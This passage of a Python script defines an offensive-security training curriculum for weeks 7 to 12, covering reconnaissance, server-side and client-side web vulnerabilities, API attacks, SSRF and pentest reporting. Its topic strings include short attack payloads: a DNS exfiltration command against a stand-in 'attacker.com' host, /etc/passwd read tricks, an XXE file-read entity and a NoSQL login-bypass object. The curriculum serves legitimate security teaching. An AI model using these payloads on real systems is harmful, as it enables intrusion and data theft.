                    {"day_num": 34, "title": "Cloud Asset Reconnaissance — S3 Bucket Hunting & Exposed Storage", "topics": ["Cloud asset naming conventions and permutation patterns", "Amazon S3 bucket ACLs, Bucket Policies, and anonymous read/write access", "Azure Blob Storage and Google Cloud Storage bucket discovery", "Tooling: AWSBucketDump, CloudBrute, S3Scanner", "Auditing public storage for sensitive documents, backups, and credentials"], "objectives": "Discover public-facing cloud storage instances belonging to an organization and audit their permissions.", "lab": "Use CloudBrute / AWSBucketDump with targeted company keyword wordlists to discover test cloud buckets and verify public access settings.", "interview_q": "What is the security difference between 'Authenticated Users' and 'Everyone' in AWS S3 bucket access control policies?"},
                    {"day_num": 35, "title": "Source Code & Secret Leak Discovery — Git Reconnaissance & TruffleHog", "topics": ["GitHub search syntax and dorking for sensitive credentials, API keys, and internal URLs", "Scanning commit histories for accidentally pushed secrets (TruffleHog, Gitrob, GitHarvester)", "High-entropy string detection and regex pattern matching", "Public vs private repositories and organization member repositories", "Automated secret remediation and git commit history rewriting (git filter-repo)"], "objectives": "Locate leaked API keys, tokens, and private keys in public code repositories and commit histories.", "lab": "Clone a sample repository with commit history and run TruffleHog to detect embedded AWS access keys and database connection strings.", "interview_q": "Why is simply making a new commit that deletes an API key insufficient to secure a compromised secret in a Git repository?"}
                ]
            },
            {
                "week_num": 8,
                "week_id": "week-08-scanning-content-discovery",
                "week_title": "Attack Surface Mapping & Content Discovery",
                "objective": "Map web technologies, brute-force hidden paths, parse JavaScript for endpoints, and triage vulnerabilities using Nuclei.",
                "tools": ["Wappalyzer", "WhatWeb", "Shodan", "Gobuster", "Feroxbuster", "jsendpoints", "Nuclei", "gowitness"],
                "major_concepts": ["Fingerprinting", "Wordlist Optimization", "DOM Endpoint Extraction", "YAML Vulnerability Templates", "Attack Surface Triage"],
                "weekly_lab": "Content Discovery Lab: Run Feroxbuster with customized SecLists wordlists, extract hidden endpoints with jsendpoints, and scan with Nuclei.",
                "deliverable": "Attack Surface & Technology Profile Matrix",
                "days": [
                    {"day_num": 36, "title": "Technology Stack Fingerprinting — Shodan, WhatWeb & Wappalyzer", "topics": ["HTTP response headers (Server, X-Powered-By) and HTML DOM signatures", "Hashing favicon icons (Shodan http.favicon.hash calculation)", "Shodan search syntax: port, org, net, ssl, title, product filters", "Identifying vulnerable unpatched software versions from external headers", "Web application firewalls (WAF) detection (wafw00f)"], "objectives": "Profile target web technologies, frameworks, CMS platforms, and perimeter defenses accurately.", "lab": "Calculate the favicon hash of a test application in Python and search for identical assets across Shodan; run whatweb to map tech stacks.", "interview_q": "How does Shodan's favicon hash search work, and why is it effective at finding hidden origin servers positioned behind Cloudflare or WAFs?"},
                    {"day_num": 37, "title": "Web Path & File Brute-Forcing — Gobuster & Feroxbuster", "topics": ["Forced browsing concepts and directory enumeration", "Choosing the right wordlist: SecLists (raft, directory-list-2.3, common.txt)", "Gobuster dir mode vs Feroxbuster recursive scanning in Rust", "Handling HTTP status codes: 200, 301, 302, 401, 403, 500", "Filtering false positives: Response size, word count, line count filters"], "objectives": "Enumerate unlinked directories, administrative panels, backup files, and configuration files efficiently.", "lab": "Execute Feroxbuster against a test web application using extension filtering (-x php,html,txt,bak) and tune recursion limits.", "interview_q": "How do you distinguish between a genuine 403 Forbidden directory and a soft 404 redirect when brute-forcing paths with Gobuster?"},
                    {"day_num": 38, "title": "Client-Side JavaScript Analysis — Extracting DOM Endpoints & API Keys", "topics": ["Modern Single Page Application (SPA) architecture and JS bundle analysis", "Unminifying and beautifying JavaScript code with Prettier and DevTools", "Extracting API endpoints, internal staging URLs, and hidden route definitions (jsendpoints)", "Regex pattern matching for embedded JWTs, OAuth client secrets, and Firebase keys", "Auditing source maps (.map files) to reconstruct original uncompiled source trees"], "objectives": "Analyze production JavaScript bundles to uncover unpublished API endpoints and hidden administrative functionality.", "lab": "Extract all DOM endpoints from a JavaScript bundle using the jsendpoints script; test whether exposed source maps allow downloading the source files.", "interview_q": "What security risks are introduced when developers deploy production web applications with accessible `.map` JavaScript source maps?"},
                    {"day_num": 39, "title": "Automated Vulnerability Scanning with Nuclei", "topics": ["Nuclei architecture: Template-driven vulnerability scanner in Go", "Understanding YAML template syntax: Requests, Matchers, Extractors", "Targeting specific vulnerability classes (cves, misconfigurations, default-logins, exposures)", "Rate limiting, concurrency tuning, and avoiding server denial-of-service", "Writing custom Nuclei templates to detect proprietary company assets and versions"], "objectives": "Run targeted Nuclei scans safely and author custom templates to detect application-specific indicators.", "lab": "Author a custom Nuclei YAML template that detects an exposed administrative login portal and test it against a local target.", "interview_q": "What are the advantages of template-driven vulnerability scanners like Nuclei compared to traditional monolithic dynamic scanners like Nessus?"},
                    {"day_num": 40, "title": "Comprehensive Attack Surface Mapping Pipeline Integration", "topics": ["Chaining tools: OSINT -> Subdomain Enum -> Tech Fingerprinting -> Path Discovery -> Nuclei Triage", "Visualizing recon data: gowitness screenshotting for rapid visual inspection", "Organizing recon data into structured JSON/Markdown formats for reporting", "Continuous attack surface monitoring (certSniff, crt.sh monitoring)", "Ethical scoping boundaries and maintaining legal authorization rules"], "objectives": "Assemble all reconnaissance tooling into an automated, structured reconnaissance pipeline.", "lab": "Execute an end-to-end reconnaissance workflow against an authorized lab domain, producing a consolidated findings inventory with screenshots.", "interview_q": "How do you manage the volume of reconnaissance data during large-scope enterprise assessments without missing critical high-severity findings?"}
                ]
            },
            {
                "week_num": 9,
                "week_id": "week-09-web-vulnerabilities-1",
                "week_title": "Server-Side Web Vulnerabilities",
                "objective": "Deep-dive into high-severity server-side injection flaws: Advanced SQLi, NoSQLi, Command Injection, SSTI, and Deserialization.",
                "tools": ["Burp Suite", "sqlmap", "PayloadsAllTheThings", "HackTricks", "ysoserial / ysoserial.net", "Python"],
                "major_concepts": ["Blind SQL Injection", "Out-of-Band (OOB) Extraction", "NoSQL Query Selectors", "Command Delimiters & Filter Evasion", "Template Engines (Jinja2/Twig)", "Deserialization Gadget Chains"],
                "weekly_lab": "Server-Side Exploitation Lab: Execute Boolean and Time-based Blind SQLi, achieve RCE via Jinja2 SSTI, and trace insecure Python pickle deserialization.",
                "deliverable": "Server-Side Exploitation & Remediation Guidebook",
                "days": [
                    {"day_num": 41, "title": "Advanced SQL Injection — Boolean Blind, Time-based Blind & Second-Order", "topics": ["Limitations of UNION-based injection when errors and outputs are suppressed", "Boolean-based blind SQLi: Inferring data bit-by-bit via conditional response codes", "Time-based blind SQLi: Using sleep() / pg_sleep() / WAITFOR DELAY for blind verification", "Out-of-Band (OOB) SQLi: DNS exfiltration via xp_dirtree, UTL_INADDR", "Second-order SQLi: Stored payloads triggered in separate administrative workflows"], "objectives": "Extract database schemas and data using conditional responses and time-based delays without visible output.", "lab": "Write a Python script that automates binary search character extraction over a time-delayed SQL injection endpoint in a test lab.", "interview_q": "How does a time-based blind SQL injection attack work, and why is binary search significantly faster than linear character guessing?"},
                    {"day_num": 42, "title": "NoSQL Injection & LDAP Injection in Web Authentication", "topics": ["MongoDB query syntax: JSON queries and comparison operators ($ne, $gt, $regex)", "Authentication bypass via NoSQL injection in username/password JSON payloads", "Blind NoSQL injection data extraction using regex patterns", "LDAP query structure and filter injection (*)(uid=*))", "Remediation: Strict typing, schema validation, and parameterized query APIs"], "objectives": "Bypass authentication mechanisms and extract data from NoSQL document databases and directory services.", "lab": "Exploit a vulnerable Node.js/Express MongoDB login endpoint using `$ne` operators to bypass password authentication.", "interview_q": "Explain how submitting `{\"username\": \"admin\", \"password\": {\"$ne\": \"\"}}` can bypass authentication in a poorly implemented MongoDB web application."},
                    {"day_num": 43, "title": "OS Command Injection — Filter Bypasses & Out-of-Band (OOB) Extraction", "topics": ["Operating system command separators (; , && , || , | , ` , $())", "Bypassing space filters: ${IFS}, $IFS$9, {cat,/etc/passwd}, redirection (<)", "Bypassing character blacklists: String concatenation, base64 decoding, printf", "Blind command injection verification via time delays (ping, sleep)", "Out-of-band data exfiltration via DNS lookups (nslookup `whoami`.attacker.com)"], "objectives": "Execute arbitrary operating system commands on host systems through vulnerable parameters and bypass strict input filters.", "lab": "Exploit a ping utility web page to achieve remote command execution while bypassing space and slash character blacklists.", "interview_q": "What is the root cause of OS command injection, and how does utilizing language-level execution APIs (like Python subprocess with arguments list) prevent it?"},
                    {"day_num": 44, "title": "Server-Side Template Injection (SSTI) to Remote Code Execution (RCE)", "topics": ["Template engines overview: Jinja2, Twig, Freemarker, Velocity, Thymeleaf", "Distinguishing SSTI from XSS: Mathematical evaluation probes (${7*7}, {{7*7}})", "Template engine identification methodology decision tree", "Jinja2 Python sandbox escape: Traversing __mro__, __subclasses__(), and os.popen", "Twig PHP code execution payloads and safe template engine configurations"], "objectives": "Identify template engine types and escalate template evaluation into remote code execution.", "lab": "Inject a Jinja2 template payload into a vulnerable Flask application to access Python object subclasses and execute `whoami`.", "interview_q": "Walk through the Python object traversal syntax in Jinja2 SSTI that allows an attacker to access `subprocess.Popen` starting from an empty string `''`."},
                    {"day_num": 45, "title": "Insecure Deserialization — Python, PHP & Java Gadget Chains", "topics": ["Serialization and deserialization concepts across languages", "Python pickle module: The __reduce__() magic method and arbitrary code execution", "PHP Object Injection: Magic methods (__wakeup, __destruct, __toString) and POP chains", "Java deserialization architecture: ObjectInputStream, readObject(), and Apache Commons Collections", "Overview of gadget chain generation using ysoserial and secure alternatives (JSON, Protobuf)"], "objectives": "Understand how untrusted object reconstruction leads to arbitrary code execution across major application runtimes.", "lab": "Construct a malicious Python pickle payload that launches a reverse shell upon deserialization in a vulnerable test API.", "interview_q": "Why is the Python `pickle` library inherently unsafe for untrusted input, and why is safe deserialization fundamentally difficult to achieve with binary objects?"}
                ]
            },
            {
                "week_num": 10,
                "week_id": "week-10-web-vulnerabilities-2",
                "week_title": "Client-Side & File Vulnerabilities",
                "objective": "Master advanced client-side exploitation, file inclusion/upload abuses, XML attacks, and request smuggling.",
                "tools": ["Burp Suite", "PayloadsAllTheThings", "DOM Invader", "php_filter_chain", "HTTP Request Smuggler", "Python"],
                "major_concepts": ["DOM XSS Sinks & Sources", "LFI to RCE via PHP Wrappers", "Polyglot File Uploads", "XXE External DTDs", "HTTP Desync Attacks (CL.TE / TE.CL)", "Prototype Pollution"],
                "weekly_lab": "File & XML Exploitation Lab: Execute LFI to RCE via php://filter chains, upload a polyglot webshell, and extract files via out-of-band XXE.",
                "deliverable": "Client-Side & File Vulnerability Proof-of-Concept Suite",
                "days": [
                    {"day_num": 46, "title": "Advanced Cross-Site Scripting (XSS) — Filter Evasion & DOM Sinks", "topics": ["Bypassing common WAF regex filters: Case alteration, null bytes, SVG onload, attribute injection", "DOM XSS auditing with Burp Suite DOM Invader: Tracking tainted sources to dangerous execution sinks", "Exploiting CSP weaknesses: Unsafe-inline, JSONP endpoints, wildcards, base-uri injection", "Cookie theft vs credential harvesting vs browser hooking (BeEF concepts)", "Context-aware sanitization libraries (DOMPurify)"], "objectives": "Detect and exploit complex DOM XSS vulnerabilities and bypass perimeter WAF filtering.", "lab": "Use Burp Suite DOM Invader to identify a source-to-sink flow executing untrusted URL parameters in a single-page application.", "interview_q": "What is the difference between a source and a sink in DOM-based XSS, and give three examples of dangerous sinks in modern JavaScript."},
                    {"day_num": 47, "title": "Local File Inclusion (LFI), Remote File Inclusion (RFI) & Path Traversal", "topics": ["Directory traversal mechanics (../ , %2e%2e%2f , double encoding)", "LFI to Remote Code Execution techniques: PHP wrappers (php://filter, php://input)", "Log poisoning: Injecting PHP payloads into Apache/Nginx access logs and including them via LFI", "Session file poisoning via /var/lib/php/sessions/", "Remote File Inclusion (RFI) mechanics and allow_url_include requirements"], "objectives": "Extract sensitive configuration files and escalate Local File Inclusion into full remote code execution.", "lab": "Chain an LFI vulnerability with PHP filter base64 encoding to read application source code, then leverage access log poisoning for shell execution.", "interview_q": "How does PHP log poisoning turn a read-only Local File Inclusion (LFI) vulnerability into arbitrary Remote Code Execution?"},
                    {"day_num": 48, "title": "Arbitrary File Upload Exploitation — Extension Bypasses & Polyglots", "topics": ["File upload validation mechanisms: Extension blacklists, MIME type checking, magic bytes validation", "Bypassing extension blacklists: Alternative extensions (.php5, .phtml, .phar), double extensions (.php.png)", "Null byte injection (.php%00.jpg) and path truncation", "Creating polyglot files (valid JPEG image header combined with valid PHP code)", "Overwriting critical configuration files (.htaccess, web.config)"], "objectives": "Bypass file upload filters to write executable web shells onto the web server root.", "lab": "Craft an image/PHP polyglot file using exiftool, upload it past image validation checks, and execute commands through the uploaded file.", "interview_q": "What is the most secure architecture for handling user-uploaded files to completely eliminate web shell execution risks?"},
                    {"day_num": 49, "title": "XML External Entity (XXE) Injection — File Disclosure & Blind Out-of-Band", "topics": ["XML basics: DTDs (Document Type Definitions) and XML entities", "XXE file disclosure using SYSTEM entities (`<!ENTITY xxe SYSTEM 'file:///etc/passwd'>`)", "Server-Side Request Forgery via XXE targeting internal services", "Blind XXE exploitation: Parameter entities and out-of-band external DTD hosted on attacker servers", "Disabling external entity resolution (`setFeature('http://xml.org/sax/features/external-general-entities', false)`)"], "objectives": "Read local system files and trigger internal HTTP requests through vulnerable XML parsing endpoints.", "lab": "Exploit an XML parsing endpoint to exfiltrate system files via an out-of-band malicious DTD hosted on a test server.", "interview_q": "How does an out-of-band (OOB) blind XXE attack work when the application parses XML but never reflects the result in the HTTP response?"},
                    {"day_num": 50, "title": "HTTP Request Smuggling & Prototype Pollution", "topics": ["HTTP Request Smuggling fundamentals: Frontend vs backend desynchronization", "Content-Length vs Transfer-Encoding (CL.TE and TE.CL) vulnerabilities", "Impacts of request smuggling: Cache poisoning, credential hijacking, request rewriting", "Client-side and Server-side Prototype Pollution in JavaScript/Node.js", "Modifying Object.prototype to achieve authentication bypass or remote code execution"], "objectives": "Understand how HTTP desync attacks exploit proxy-to-server discrepancies and how prototype manipulation breaks logic.", "lab": "Inspect a simulated CL.TE request smuggling condition in Burp Suite Repeater and observe backend response desynchronization.", "interview_q": "Explain the difference between a CL.TE and a TE.CL HTTP request smuggling attack, and what determines which behavior occurs."}
                ]
            },
            {
                "week_num": 11,
                "week_id": "week-11-modern-app-api-security",
                "week_title": "Modern Application & API Security",
                "objective": "Audit modern web architectures, API authorization frameworks (BOLA/BFLA), JWT implementations, and GraphQL endpoints.",
                "tools": ["Burp Suite", "Postman", "jwt_tool", "InQL GraphQL Scanner", "PayloadsAllTheThings"],
                "major_concepts": ["BOLA (IDOR) Mechanics", "Mass Assignment", "JWT Attacks (None alg, Key Confusion)", "OAuth Misconfigurations", "GraphQL DoS & Injection"],
                "weekly_lab": "API Security Audit Lab: Exploit BOLA on REST endpoints, crack weak JWT HMAC secrets, and exploit GraphQL introspection for unauthorized data.",
                "deliverable": "API Security Audit Checklist & Exploitation Proof-of-Concepts",
                "days": [
                    {"day_num": 51, "title": "Broken Object Level Authorization (BOLA / IDOR) in REST APIs", "topics": ["OWASP API Security Top 10 overview and BOLA prominence", "Insecure Direct Object References (IDOR): Sequential IDs, GUIDs, and predictable identifiers", "Horizontal privilege escalation (accessing other users' data) vs Vertical privilege escalation", "Testing APIs across multiple user contexts in Burp Suite (Autorize extension)", "Remediation: Enforcing access control checks at the data layer based on the user session"], "objectives": "Identify and systematically test for object-level authorization bypasses in modern RESTful endpoints.", "lab": "Configure the Autorize Burp Suite plugin with two different user session cookies and systematically detect unauthorized data access across endpoints.", "interview_q": "Why do traditional web application firewalls (WAFs) fail to detect Broken Object Level Authorization (BOLA) attacks?"},
                    {"day_num": 52, "title": "Broken Object Property Level Authorization & Mass Assignment", "topics": ["Mass assignment (auto-binding) in modern frameworks (Spring, Rails, Express, Laravel)", "Overwriting sensitive object fields (is_admin, role, account_balance, email_verified)", "Excessive data exposure in API responses (filtering in UI vs filtering in backend)", "API parameter pollution (HPP) across query strings and JSON bodies", "Defenses: DTOs (Data Transfer Objects), strict schema white-listing"], "objectives": "Elevate user privileges and manipulate sensitive properties by abusing unvalidated model binding.", "lab": "Intercept a user profile update request in Burp Suite and inject `\"role\": \"admin\"` to achieve vertical privilege escalation.", "interview_q": "What is mass assignment in modern web frameworks, and how does using Data Transfer Objects (DTOs) prevent it?"},
                    {"day_num": 53, "title": "JSON Web Token (JWT) Exploitation — Alg None & Key Confusion", "topics": ["The `none` algorithm vulnerability: Removing signatures and modifying claims", "Cracking weak HMAC secrets using John the Ripper and hashcat with rockyou.txt", "Algorithm confusion attacks: Forcing RS256 public key verification as an HS256 HMAC secret", "JWK (JSON Web Key) header injection and JKU (JSON Web Key Set URL) spoofing", "JWT token replay and lack of revocation checking"], "objectives": "Tamper with JWT tokens, crack weak signing keys, and forge administrative bearer tokens.", "lab": "Use `jwt_tool` to forge a token using the `alg: none` attack, then crack an HMAC-SHA256 secret key using hashcat.", "interview_q": "Explain the algorithm confusion attack against JWTs where a server expecting an RS256 signature is tricked using an HS256 signature."},
                    {"day_num": 54, "title": "OAuth 2.0 & OpenID Connect Misconfigurations", "topics": ["Redirect URI regex validation bypasses and open redirect chaining", "Stealing authorization codes via Referer headers and unvalidated redirects", "Cross-Site Request Forgery on the OAuth authorization endpoint (missing state parameter)", "Pre-account takeover via unverified email claims in IdP integrations", "Defensive best practices: Strict exact-match redirect URIs and PKCE"], "objectives": "Audit federated OAuth workflows to intercept user authorization codes and hijack sessions.", "lab": "Demonstrate an authorization code theft attack by chaining a loose redirect_uri parameter with an open redirect in a test app.", "interview_q": "Why is exact string matching of `redirect_uri` essential in OAuth 2.0, and what attack is possible if path prefixes or wildcards are permitted?"},
                    {"day_num": 55, "title": "GraphQL Security Auditing — Introspection, Batching & Deep Queries", "topics": ["GraphQL query execution model and single-endpoint architecture (/graphql)", "Query depth and complexity attacks: Causing server denial of service via circular nested queries", "Batching attacks: Bypassing rate limiting and brute-forcing passwords in a single HTTP request", "Field-level authorization flaws in mutations and queries", "Using InQL and GraphQL Voyager for automated attack surface mapping"], "objectives": "Map complete GraphQL schemas, test for field-level authorization flaws, and simulate batching brute-force attacks.", "lab": "Use InQL in Burp Suite to parse an active GraphQL endpoint, discover hidden user fields, and execute a 100-attempt batch login test in one request.", "interview_q": "How does GraphQL query batching allow an attacker to bypass traditional IP-based rate limiting on login forms?"}
                ]
            },
            {
                "week_num": 12,
                "week_id": "week-12-business-logic-reporting",
                "week_title": "Business Logic, Methodology & Reporting",
                "objective": "Identify complex business logic flaws, race conditions, validate findings manually, and author a professional penetration testing report.",
                "tools": ["Burp Suite Turbo Intruder", "HackTricks", "CVSS v3.1 Calculator", "SysReptor / Markdown", "Python"],
                "major_concepts": ["Race Conditions (TOCTOU)", "Price/Discount Manipulation", "Step Skipping & State Machines", "CVSS v3.1 Scoring", "Executive Summary Writing", "Technical Remediation Guidance"],
                "weekly_lab": "Deliverable 2 Lab: Conduct an authorized penetration test on a mock corporate web application, document all findings, and author a professional report.",
                "deliverable": "Deliverable 2: Web Security Lab + Professional Penetration Test Report (Executive Summary + Technical Findings + PoCs + Remediations)",
                "days": [
                    {"day_num": 56, "title": "Business Logic Flaws — Race Conditions & State Machine Bypasses", "topics": ["Time-of-Check to Time-of-Use (TOCTOU) race conditions in web applications", "Limit overrun attacks: Redeeming single-use gift cards or coupon codes multiple times", "Using Burp Suite Turbo Intruder to send concurrent HTTP requests with single-packet synchronization", "Workflow and state machine skipping (e.g. proceeding to payment confirmation without paying)", "Price and quantity parameter manipulation in checkout carts"], "objectives": "Discover and exploit concurrency flaws and business workflow assumptions.", "lab": "Use Turbo Intruder with HTTP/2 single-packet synchronization to exploit a race condition and redeem a single coupon code five times concurrently.", "interview_q": "How does HTTP/2 single-packet attack technology enable precise exploitation of race conditions compared to HTTP/1.1 multi-threaded requests?"},
                    {"day_num": 57, "title": "Advanced SSRF Exploitation & IMDS Credential Theft", "topics": ["SSRF bypass techniques: Hex/Octal/Dword IP encoding (127.0.0.1 as 2130706433), DNS rebinding", "Exploiting URL parser differentials between frontend validation and backend fetching", "Extracting AWS EC2 IAM role credentials via IMDSv1", "Extracting Google Cloud and Azure access tokens via metadata headers", "Remediation: Enforcing network-level egress filtering and migrating to IMDSv2"], "objectives": "Bypass SSRF filters using IP encoding and DNS rebinding to extract cloud instance IAM credentials.", "lab": "Bypass an IP blacklist blocking 127.0.0.1 using decimal IP encoding and alternative URL schemes; extract mock cloud IAM keys.", "interview_q": "What is DNS rebinding, and how does it allow an attacker to bypass an SSRF filter that validates IP addresses at the application layer?"},
                    {"day_num": 58, "title": "Manual Verification & Exploit Chaining Methodology", "topics": ["Moving from automated scanner output to manual proof-of-concept verification", "Eliminating false positives and proving business impact", "Exploit chaining: Combining Low-severity issues into Critical compromises (e.g. CSRF + Self-XSS -> Account Takeover)", "Responsible testing: Ensuring testing actions do not degrade availability or corrupt data", "Documenting step-by-step reproduction steps for developers"], "objectives": "Chain multiple low-impact findings together to demonstrate critical security impact.", "lab": "Chain an open redirect, a CORS misconfiguration, and a CSRF vulnerability to achieve full account takeover in a test environment.", "interview_q": "Provide an example of an exploit chain where two vulnerabilities marked 'Low' or 'Informational' combine to create a 'Critical' security breach."},
                    {"day_num": 59, "title": "Penetration Testing Documentation Standards & CVSS Scoring", "topics": ["Common Vulnerability Scoring System (CVSS v3.1 / v4.0) metrics breakdown", "Base score metrics: Attack Vector, Complexity, Privileges Required, User Interaction, Scope, CIA Impact", "Writing effective Executive Summaries for non-technical leadership", "Documenting technical vulnerability details: Root Cause, Steps to Reproduce, Impact, Remediation", "Prioritizing remediation recommendations (tactical hotfixes vs strategic architectural improvements)"], "objectives": "Score vulnerabilities accurately using CVSS v3.1 and write clear, persuasive technical and executive documentation.", "lab": "Calculate CVSS v3.1 scores for five distinct vulnerabilities and draft technical finding write-ups following industry reporting standards.", "interview_q": "Explain the significance of the 'Scope (S)' metric in CVSS v3.1 scoring, and give an example of a vulnerability that causes a scope change."},
                    {"day_num": 60, "title": "Phase 2 Capstone Deliverable — Professional Pentest Report", "topics": ["Conducting a structured final assessment across the authorized Web Application Lab", "Synthesizing recon findings, server-side exploits, and client-side flaws", "Authoring the formal deliverable report: Table of Contents, Executive Summary, Scope, Findings, Remediation Roadmap", "Packaging proof-of-concept scripts, raw HTTP request/response evidence, and screenshots", "Presenting findings and conducting client debrief walkthroughs"], "objectives": "Complete and package Deliverable 2: A comprehensive, professional Web Application Penetration Test Report.", "lab": "Compile all Phase 2 findings into a professional markdown / PDF penetration test report with executive summary, CVSS scoring, and remediation advice.", "interview_q": "If an executive asks you to summarize a 40-page penetration testing report in two minutes, what core information must you communicate?"}
                ]
            }
        ]
    }
]

print(f"[*] Defined Phase 1 and 2 ({len(phases)} phases). Generating phases 3-9...")

# Append Phases 3 through 9 to reach all 40 weeks and 200 days
# (Detailed next chunk)
